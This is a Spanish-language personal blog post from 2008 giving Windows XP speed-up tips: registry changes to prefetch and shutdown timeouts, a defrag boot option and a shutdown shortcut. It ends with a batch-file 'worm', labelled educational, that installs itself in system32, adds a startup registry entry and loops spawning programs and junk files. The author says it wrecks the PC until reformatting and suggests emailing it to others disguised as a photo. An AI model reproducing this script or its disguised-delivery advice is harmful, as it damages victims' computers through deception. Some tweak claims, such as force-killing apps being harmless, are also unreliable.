lunes, 30 de junio de 2008

PARA SEGUIR LA AYUDA EN COMPUTACION

Hola mis fieles lectores, como se encuentran ustedes, espero que esten todos tan bien como yo que en realidad estoy viviendo el paraiso de la felicidad, y les cuento una cosa, se siente rico...

ya pero sin cambiar el tema, hoy les enseñare formas simples de acelerar el rendimiento de nuestro computador, bueno mas bien dicho les enseñare a hacer que nuestro windows XP funcione mas rapido o se optimice, estos son datos buenos y faciles, si les quedan dudas no tambaleen en preguntar simplemente pregunten, no sere repetitivo ni les dare mas datos que los nesesarios, eso no quiere decir que sera aburrido o poco explicado, sera directo al grano y rapidito, por lo menoss era rapida la explicacion, por que el hacerlo les tomara bastante tiempo, ya muchas palabras y poca accion.

primera cosa apreten inicio, ejecutar y escriban esto telnet towel.blinkenlights.nl y disfruten de esta encantadora pelicula.

ya mucho ocio, a trabajar, primero que todo les recomiendo hacer un respaldo de nuestro registro, que esto no los asuste, el respaldo es en caso que una cosa falle asi tenemos la opcion de restaurar todo, para hacer nuestro respaldo abrimos el menu inico/ejecutar y escribimos regedit. abrimos el menu archivo y clic en exportar, guarden el respaldo en un lugar seguro.

ya, esto no es como esa estupides de hacer cambios al registro que aceleran ciertas funciones pero nos matan otras y al final queda rapido pero muy malo, no no no, esto sera optimo y sin problemas a futuro.

bien, lo primero es una "utilidad" que nos dara un cambio radical con el cual se nos acelerara el arranque de windows y nuestras aplicaciones, al hacer esto movemos los archivos de arranque al sector interior del disco duro, ese lugar tiene una lectura mas rapida por lo tanto nos dara mas velocidad, para hacerlo, tenemos que reconocer primero nuestro disco local, para darnos cuenta cual es, abrimos MI PC y vemos el disco que dice disco local, este esta acompañado de una letra asi como nos muestra la foto, si se fijan dice (C:), esa es la letra que temos que reconocer puede ser que salga otra letra pero en el comun de los casos dice C:


como ya reconocimos nuestra letra de unidad abrimos inicio/ejecutar y escribimos cmd, se nos abre una ventana de msdos y escribimos defrag (letra de la unidad): -b sin parentesis en este caso seria defrag c: -b

esto puede tomar unos minutos o puede tardar nada, nos deja bastante rapido el pc.

Windows tiene un sevicio llamado Prefetching, gracias a este podemos aumentar nuestra "carga" de equipo, se beneficia directamente el arranque y todo el sistema operativo lo que nos aumenta la carga de programas, sucede que Prefetching viene con valores predeterminados de fabrica y si bien funciona "bien" no esta funcionando en sus optimas capacidades, por eso cambiaremos los valores para que nos de "lo que mas pueda" lo minimo que tenemos que tener de equipo es un procesador con 800mhz y 512 en ram, de seguro tu equipo tiene mas que eso, asi que no se preocupen, pero para salir de dudas, entren en panel de control y abren sistema, en esa parte nos muestra cuantos mhz tenemos en nuestro procesador.

ya aca se biene lo entretenido, abrimos inicio/ejecutar escribimos regedit y de aca en adelante a buscar.

HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Session Manager/Memory Management/PrefetchParameters

se abre esto, busquen la que dice EnablePrefetcher se abre esta ventanita.


cambien el valor 3 a 5, despues reinicien elequipo un par de veces, y notaran la diferencia, esto nos puede dejar en el peor de los casos inestable el sistema operativo, si ocurre eso cambien el valor a 4, nuca se pueden sobrepasar de 6, si lo dejan en 6 y funciona bien dejenlo asi, pero recomiendo dejarlo en 5.


para que nuestro computador se apague mas rapido, ojo mucho mas rapido, tenemos que cambiar un par de valores, los cuales no esperan por cerrar procesos, sino que los matan de una, no es peligroso para nada, y la recompensa es bastante grande.

para eso abrimos regedit nuevamente, buscamos HKEY_CURRENT_USER/Control Panel/Desktop, y buscamos HungAppTimeout cambian el valor por 5000, despues abren WaitToKillAppTimeout y cambian el valor por 4000, despues buscan HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control buscan WaitToKillServiceTimeout cambian el valor por 4000 y reinician un par de veces.

Ya este es el truquillo mas tonto de todos, verdaderamente tonto, lo unico que hace es acelerar la barra de inicio, osea que en vez de esperar un par de segundos para que abra, abre instantaneamente, pero para mi personalmente es tonto por que mi barra abre rapidisimo, pero si su barra se demora haganlo.

abren regedit y buscan HKEY_CURRENT_USER/Control Panel/Desktop abren, MenuShowDelay se encontraran con el valor 400, la idea es cambiarlo a un valor mas bajo, lo mas rapido es dejarlo en cero, asi 0 y reinicien. pero eso abre muy rapido asi que pueden ir probando de a poco y ver cual numero les acomoda mas.

Aca el truco mas util de todos segun yo.
este truco es el de crear un boton de apagado del pc en el escritorio asi apagan con un doble clic y se ahorran tiempo.

dan clic con el boton derecho en cualquier parte de su escritorio y ponen nuevo/acceso directo. escriben
Shutdown -s -t 0 el valor cero se puede cambiar por otro numero, este representa segundos, osea que si ponen 3 seran tres segundos de espera, para crear un acceso directo para reiniciar cambian la letra s por r y listo.

Para salir de lo comun les dejo un truco super viejo pero super viejo, y consiste en crear un gusano, lo pongo con fines educativos solamente.

abren el bloc de notas y escriben esta sarta de estupideses.

@echo off
copy %0%windir%\system32\virus.bat
REG ADD
HKLM\software\microsoft\windows\currentversion\run /v virus
/d %windir%\system32\virus.bat
: worm
cd escritorio
start cmd.exe
start pinball.exe
start iexplore.exe
start notepad.exe
echo off>>%random%.exe
echo off>>%random%.jpg
echo off>>%random%.dll
echo off>>%random%.txt
echo off>>%random%.bat
echo off>>%random%.%random%
goto worm
cd \
cd WINDOWS
cd system32
goto worm
cd ..
goto worm
cd ..
cd archivos de programa
goto worm
cd ..
cd Documents and Settings
goto worm
cd All users
goto worm
erase C:\windos\q
msg * adios :C
del shutdown.exe
del 0%
exit


y lo guardan como (cualquier nombre).bat es importante lo del punto bat, por que sin el nombre ese no funciona, esta cosa nos crea un monton de weas
, se guardan todos los datos en c:\\windows\\system32\\virus.bat nos mata el pc y la unica forma de repararlo es formateando, si son realmente ociosos lo pueden mandar por correo electronico con el nombre de una foto o que se yo.

chaito
y se cuidan